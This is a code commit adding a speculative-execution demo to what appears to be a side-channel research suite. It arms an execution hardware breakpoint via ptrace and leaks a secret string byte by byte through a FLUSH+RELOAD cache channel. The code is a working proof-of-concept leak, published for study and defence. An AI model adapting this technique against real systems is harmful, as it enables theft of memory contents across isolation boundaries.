Speculation over execution hardware breakpoint fault. (#72)
Also make ForceRead an always-inlined function to keep call and ret instructions out of the speculation window.
diff --git a/demos/CMakeLists.txt b/demos/CMakeLists.txt
index 7322953..c6391be 100644
--- a/demos/CMakeLists.txt
+++ b/demos/CMakeLists.txt
@@ -102,10 +102,14 @@
if((${CMAKE_SYSTEM_NAME} MATCHES "^(Linux)$") AND
(${CMAKE_SYSTEM_PROCESSOR} MATCHES "^(i.86)|(x86_64)$"))
- # Speculation over hardware breakpoint trap
+ # Speculation over hardware breakpoint trap (read watcher)
add_executable(speculation_over_hw_breakpoint speculation_over_hw_breakpoint.cc)
target_link_libraries(speculation_over_hw_breakpoint safeside)
+ # Speculation over hardware breakpoint fault (execution watcher)
+ add_executable(speculation_over_exec_hw_breakpoint speculation_over_exec_hw_breakpoint.cc)
+ target_link_libraries(speculation_over_exec_hw_breakpoint safeside)
+
# Meltdown AC -- speculative fetching of unaligned data
add_executable(meltdown_ac meltdown_ac.cc)
target_link_libraries(meltdown_ac safeside)
diff --git a/demos/speculation_over_exec_hw_breakpoint.cc b/demos/speculation_over_exec_hw_breakpoint.cc
new file mode 100644
index 0000000..3d90897
--- /dev/null
+++ b/demos/speculation_over_exec_hw_breakpoint.cc
@@ -0,0 +1,218 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Demonstrates speculative execution over hardware breakpoint fault.
+ * That is a breakpoint that guards an instruction address and is triggered when
+ * that instruction is executed (not read nor written).
+ * We fork the process and run the demonstration in the child, while the parent
+ * takes care of setting up the breakpoint and of moving the instruction pointer
+ * past the dead code after the fault.
+ **/
+
+#include "compiler_specifics.h"
+
+#if !SAFESIDE_LINUX
+# error Unsupported OS. Linux required.
+#endif
+
+#if !SAFESIDE_IA32 && !SAFESIDE_X64
+# error Unsupported CPU. X86/64 required.
+#endif
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include <signal.h>
+#include <sys/ptrace.h>
+#include <sys/types.h>
+#include <sys/user.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+#include "local_content.h"
+#include "utils.h"
+
+// Address of the "breakpoint" label emitted by the inline assembly in
+// LeakByte. It points to the "nop" instruction that will be guarded by the
+// execution breakpoint; the parent writes this address into the child's dr0.
+extern char breakpoint[];
+
+// Leaks the byte stored at data[offset] through the cache side channel.
+//
+// Each run flushes the oracle, architecturally touches the oracle entry that
+// belongs to a byte of the public part of "data", and then executes the "nop"
+// guarded by the execution breakpoint. The read of the oracle entry selected
+// by data[offset] is placed after that "nop", so it is only ever executed
+// speculatively; the tracer resumes the child at "afterspeculation".
+//
+// data:   base pointer; indexed both with offsets inside public_data and with
+//         "offset".
+// offset: index (relative to "data") of the byte to leak.
+//
+// Returns the byte reported by RecomputeScores once it reports success.
+// Terminates the process with EXIT_FAILURE if a run still fails after the run
+// counter has exceeded 100000.
+static char LeakByte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(public_data);
+    sidechannel.FlushOracle();
+
+    // We have to precompute the addresses in the oracle, because here the
+    // speculation window on Intel (not on AMD) is too small to allow
+    // computation of the unsafe address in the oracle speculatively.
+    //
+    // The byte is converted through unsigned char: plain char may be signed,
+    // and a negative value would otherwise turn into a huge index that points
+    // far outside the 256-entry oracle.
+    const void *safe_address =
+        oracle.data() + static_cast<unsigned char>(data[safe_offset]);
+
+    // Architecturally dead variable - never read again. It is also the only
+    // fetch of the "data[offset]". Therefore its value is architecturally
+    // isolated from the rest of the program.
+    const void *unsafe_address =
+        oracle.data() + static_cast<unsigned char>(data[offset]);
+
+    // Successful access of the safe address in the Oracle.
+    ForceRead(safe_address);
+
+    // NOP instruction after the breakpoint label. That one is guarded by the
+    // execution breakpoint. Contrary to the read/write hardware watcher, this
+    // is a fault (not a trap) and the tracer moves the instruction pointer to
+    // afterspeculation instead.
+    asm volatile(
+        "breakpoint:\n"
+        "nop\n");
+
+    // Dead code. Executed only speculatively.
+    ForceRead(unsafe_address);
+
+    std::cout << "Dead code. Must not be printed." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // Tracer moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
+
+    // result.first says whether the scores identified a byte; result.second
+    // is that byte (or the current best guess).
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+// Tracee side of the demo: asks to be traced, stops itself so that the parent
+// can arm the hardware breakpoint, and then prints the private string one
+// leaked byte at a time.
+void ChildProcess() {
+  // Hand control over our execution to the parent; bail out if that fails.
+  if (ptrace(PTRACE_TRACEME, 0, nullptr, nullptr) == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  // Stop here until the parent has put the hardware breakpoint on the
+  // critical nop instruction and resumed us.
+  raise(SIGSTOP);
+  MemoryAndSpeculationBarrier();
+
+  std::cout << "Leaking the string: " << std::flush;
+
+  // Distance of the private string from the public one; LeakByte is always
+  // handed public_data as its base pointer.
+  const size_t secret_start = private_data - public_data;
+  size_t index = 0;
+  while (index < strlen(private_data)) {
+    std::cout << LeakByte(public_data, secret_start + index) << std::flush;
+    ++index;
+  }
+
+  std::cout << "\nDone!\n";
+}
+
+// Tracer side of the demo. Repeatedly waits for the child and reacts to the
+// signal it stopped on:
+//   SIGSTOP - writes the address of the "breakpoint" label into the child's
+//             dr0 and enables it through dr7.
+//   SIGTRAP - rewrites the child's instruction pointer to "afterspeculation".
+// After either of those the child is resumed with PTRACE_CONT.
+//
+// The loop ends when wait() fails, when the child is reported in any state
+// other than stopped, or when it stops on a different signal. Any failing
+// ptrace call terminates the parent with EXIT_FAILURE.
+//
+// child: pid of the traced process.
+void ParentProcess(pid_t child) {
+  while (true) {
+    // Initialised and guarded by the wait() result so that the status macros
+    // never inspect an indeterminate value.
+    int wstatus = 0;
+    if (wait(&wstatus) == -1 || !WIFSTOPPED(wstatus)) {
+      break;  // wait() failed or the child is not in a stopped state.
+    }
+
+    int res;
+    if (WSTOPSIG(wstatus) == SIGSTOP) {
+      // Set debug registers.
+      // The child stopped itself with "raise(SIGSTOP)". We have to put the
+      // breakpoint on the "nop" instruction marked by the "breakpoint" label
+      // and let the child continue.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[0]),
+                   breakpoint);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr0 failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Setting the 0th bit in dr7.
+      // 0th bit means the active breakpoint is in local dr0.
+      // We leave the length bits set to 00 so that we get one-byte
+      // granularity. We also leave the mode bits set to 00, because it's an
+      // execution breakpoint.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[7]), 0x1);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr7 failed. errno: " << errno
+                  << std::endl;
+        exit(EXIT_FAILURE);
+      }
+    } else if (WSTOPSIG(wstatus) == SIGTRAP) {
+      // Move instruction pointer.
+      // The child was trapped by executing the hardware breakpoint. We just
+      // move its instruction pointer to the afterspeculation label.
+      user_regs_struct regs;
+      // Read general purpose register values of the child.
+      res = ptrace(PTRACE_GETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_GETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Move the child's instruction pointer to afterspeculation.
+#if SAFESIDE_X64
+      regs.rip = reinterpret_cast<size_t>(afterspeculation);
+#else
+      regs.eip = reinterpret_cast<size_t>(afterspeculation);
+#endif
+
+      // Store the shifted child's instruction pointer value.
+      res = ptrace(PTRACE_SETREGS, child, nullptr, &regs);
+      if (res == -1) {
+        std::cerr << "PTRACE_SETREGS failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+    } else {
+      // Unexpected signal received by the child.
+      // The child didn't stop with SIGSTOP nor SIGTRAP.
+      // Terminating the parent.
+      break;
+    }
+
+    // Wake up the child.
+    res = ptrace(PTRACE_CONT, child, nullptr, nullptr);
+    if (res == -1) {
+      std::cerr << "PTRACE_CONT after signal failed." << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+// Forks the demo into a tracee (child), which runs the leak, and a tracer
+// (parent), which arms the breakpoint and steers the child past the dead code.
+// Returns EXIT_FAILURE if the process cannot be forked.
+int main() {
+  const pid_t pid = fork();
+  if (pid == -1) {
+    // No child was created, so there is nothing to trace or to wait for.
+    std::cerr << "fork failed." << std::endl;
+    return EXIT_FAILURE;
+  }
+
+  if (pid == 0) {
+    // Tracee.
+    ChildProcess();
+  } else {
+    // Tracer.
+    ParentProcess(pid);
+  }
+  return EXIT_SUCCESS;
+}
diff --git a/demos/utils.cc b/demos/utils.cc
index fb3264a..872cda9 100644
--- a/demos/utils.cc
+++ b/demos/utils.cc
@@ -21,13 +21,6 @@
constexpr size_t kCacheLineSize = 64;
-// Forced memory load. Used during both real and speculative execution to create
-// a microarchitectural side effect in the cache. Also used for latency
-// measurement in the FLUSH+RELOAD technique.
-void ForceRead(const void *p) {
- (void)*reinterpret_cast<const volatile char *>(p);
-}
-
// Flush a memory interval from cache. Used to induce speculative execution on
// flushed values until they are fetched back to the cache.
void FlushFromCache(const char *start, const char *end) {
diff --git a/demos/utils.h b/demos/utils.h
index e961c37..914290f 100644
--- a/demos/utils.h
+++ b/demos/utils.h
@@ -14,11 +14,21 @@
* limitations under the License.
*/
-// Forced memory load. Used during both real and speculative execution to create
-// a microarchitectural side effect in the cache. Also used for latency
-// measurement in the FLUSH+RELOAD technique.
-void ForceRead(const void *p);
+#ifndef DEMOS_UTILS_H
+#define DEMOS_UTILS_H
+
+#include "compiler_specifics.h"
+
+// Forced memory load. Reads one byte at "p" through a pointer-to-volatile and
+// discards the value, which loads the memory into cache. Used during both
+// real and speculative execution to create a microarchitectural side effect
+// in the cache. Also used for latency measurement in the FLUSH+RELOAD
+// technique.
+// Should be inlined to minimize the speculation window: defined in the header
+// and marked SAFESIDE_ALWAYS_INLINE so that no call and ret instructions are
+// needed to perform the read.
+SAFESIDE_ALWAYS_INLINE
+inline void ForceRead(const void *p) {
+ (void)*reinterpret_cast<const volatile char *>(p);
+}
// Flush a memory interval from cache. Used to induce speculative execution on
// flushed values until they are fetched back to the cache.
void FlushFromCache(const char *start, const char *end);
+#endif // DEMOS_UTILS_H